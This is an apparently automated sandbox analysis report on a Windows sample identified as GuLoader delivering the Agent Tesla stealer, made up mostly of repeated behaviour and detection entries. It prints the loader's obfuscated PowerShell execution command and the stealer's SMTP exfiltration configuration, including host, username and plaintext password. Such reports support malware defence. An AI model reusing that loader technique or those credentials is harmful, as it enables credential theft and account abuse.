Windows
Analysis Report
ulf4JrCRk2.exe
Overview
General Information
Sample name: | ulf4JrCRk2.exerenamed because original name is a hash value |
Original sample name: | 26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c.exe |
Analysis ID: | 1549408 |
MD5: | a8a9f68888009bf9737238846f3b6ec3 |
SHA1: | 328fc40462eca7d498bfe67b17a01a1ff009796b |
SHA256: | 26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c |
Tags: | exeuser-adrian__luca |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- ulf4JrCRk2.exe (PID: 3868 cmdline:
"C:\Users\ user\Deskt op\ulf4JrC Rk2.exe" MD5: A8A9F68888009BF9737238846F3B6EC3) - powershell.exe (PID: 2804 cmdline:
"Powershel l.exe" -wi ndowstyle minimized "$Hypnotiz ability77 = Get-Cont ent -raw ' C:\Users\u ser\AppDat a\Roaming\ supersyste m\panelet\ Nyslaaede. Skr' ; $Ac rodynia=$H ypnotizabi lity77.Sub String(427 35,3);.$Ac rodynia($H ypnotizabi lity77) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - msiexec.exe (PID: 764 cmdline:
"C:\Window s\SysWOW64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 1 entries |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:10:05.747802+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.9 | 49795 | TCP |
2024-11-05T16:10:43.237145+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.9 | 49977 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:09:44.203457+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:10:30.808031+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:10:30.808031+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:09:44.203457+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00402645 | |
Source: | Code function: | 0_2_00405FF5 | |
Source: | Code function: | 0_2_004055B1 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_0040511A |
Source: | Code function: | 0_2_00403217 |
Source: | Code function: | 0_2_00404959 | |
Source: | Code function: | 0_2_004062CB | |
Source: | Code function: | 2_2_0456E3E0 | |
Source: | Code function: | 5_2_02E3E758 | |
Source: | Code function: | 5_2_02E34AC0 | |
Source: | Code function: | 5_2_02E3D770 | |
Source: | Code function: | 5_2_02E341F0 | |
Source: | Code function: | 5_2_02E33EA8 | |
Source: | Code function: | 5_2_26ABE828 | |
Source: | Code function: | 5_2_26AB59D8 | |
Source: | Code function: | 5_2_26ABAC98 | |
Source: | Code function: | 5_2_26AB8EF0 | |
Source: | Code function: | 5_2_26AB0040 | |
Source: | Code function: | 5_2_26AB87D8 | |
Source: | Code function: | 5_2_26AB3300 | |
Source: | Code function: | 5_2_26ABB378 | |
Source: | Code function: | 5_2_26AB0011 |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_0040442A |
Source: | Code function: | 0_2_00402036 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Code function: | 0_2_0040601C |
Source: | Code function: | 2_2_0456CE94 | |
Source: | Code function: | 2_2_0744B1AB | |
Source: | Code function: | 2_2_0744AFBE | |
Source: | Code function: | 2_2_0744AE49 | |
Source: | Code function: | 2_2_08D640BC | |
Source: | Code function: | 2_2_08D64829 | |
Source: | Code function: | 2_2_08D59376 | |
Source: | Code function: | 2_2_08D635CA | |
Source: | Code function: | 5_2_02E30C7A | |
Source: | Code function: | 5_2_040D35CA | |
Source: | Code function: | 5_2_040D40BC | |
Source: | Code function: | 5_2_040C9376 | |
Source: | Code function: | 5_2_040D4829 |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | HTTP traffic detected: |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Code function: | 0_2_00402645 | |
Source: | Code function: | 0_2_00405FF5 | |
Source: | Code function: | 0_2_004055B1 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3403 |
Source: | Process information queried: | Jump to behavior |
Anti Debugging |
---|
Source: | Code function: | 5_2_02E37EC0 |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_02C6D6E0 |
Source: | Code function: | 0_2_0040601C |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
